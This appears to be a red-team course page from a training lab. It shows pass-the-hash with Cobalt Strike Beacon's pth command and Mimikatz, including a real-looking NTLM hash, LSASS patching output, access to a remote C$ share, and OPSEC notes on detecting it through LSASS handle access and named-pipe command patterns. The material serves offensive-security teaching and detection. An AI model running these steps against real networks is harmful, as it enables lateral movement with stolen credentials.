Pass the hash is a technique that allows you to authenticate to a Windows service using the NTLM hash of a user's password. It works by starting a new logon session with a fake identity and then replacing the session information with the domain, username and NTLM hash provided.
Beacon has a dedicated pth command which executes Mimikatz in the background.
This command requires elevated privileges.
First, attempt to list the C$ share of the WEB machine - this will fail because bfarmer is not a local admin there.
beacon> getuid
[*] You are DEV\bfarmer (admin)
beacon> ls \\web.dev.cyberbotic.io\c$
[-] could not open \\web.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED
Then run the pth command with jking's username and NTLM hash.
beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c
user : jking
domain : DEV
program : C:\Windows\system32\cmd.exe /c echo 71fb38e2d65 > \\.\pipe\675b08
impers. : no
NTLM : 59fc0f884922b4ce376051134c71e22c
| PID 1932
| TID 6600
| LSA Process is now R/W
| LUID 0 ; 7479840 (00000000:00722220)
\_ msv1_0 - data copy @ 000001F6344B3D20 : OK !
\_ kerberos - data copy @ 000001F6345BD7C8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000001F6344C6128 (32) -> null
We can see that the command Mimiktaz runs passes the new credentials over a named pipe, which Beacon then impersonates automatically. We can then attempt to list the C$ share again, which will succeed.
beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 18:50:13 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 08/15/2022 18:58:09 inetpub
dir 05/08/2021 08:20:24 PerfLogs
dir 08/24/2022 11:02:25 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 08/31/2022 17:40:32 ProgramData
dir 08/15/2022 18:31:08 Recovery
dir 08/30/2022 11:16:24 System Volume Information
dir 08/30/2022 17:51:08 Users
dir 08/30/2022 20:19:27 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 09/01/2022 07:26:41 DumpStack.log.tmp
384mb fil 09/01/2022 07:26:41 pagefile.sys
To "drop" impersonation afterwards, use the rev2self command.
beacon> rev2self
[*] Tasked beacon to revert token
beacon> ls \\web.dev.cyberbotic.io\c$
[-] could not open \\web.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED
OPSEC
Two opportunities to detect PTH are the R/W handle to LSASS; and looking for the echo foo > \\.\pipe\bar pattern in command-line logs.
The former is already part of the "Suspicious Handle to LSASS" saved search. This time we see an access mask of 0x1038. This is a combination of PROCESS_QUERY_LIMITED_INFORMATION (0x1000), PROCESS_VM_WRITE (0x0020), PROCESS_VM_READ (0x0010) and PROCESS_VM_OPERATION (0x0008).
The latter can be found via the "Suspicious Named Pipe Impersonation" search, which queries process events where the arguments contain "echo", ">" and "\\.\pipe\".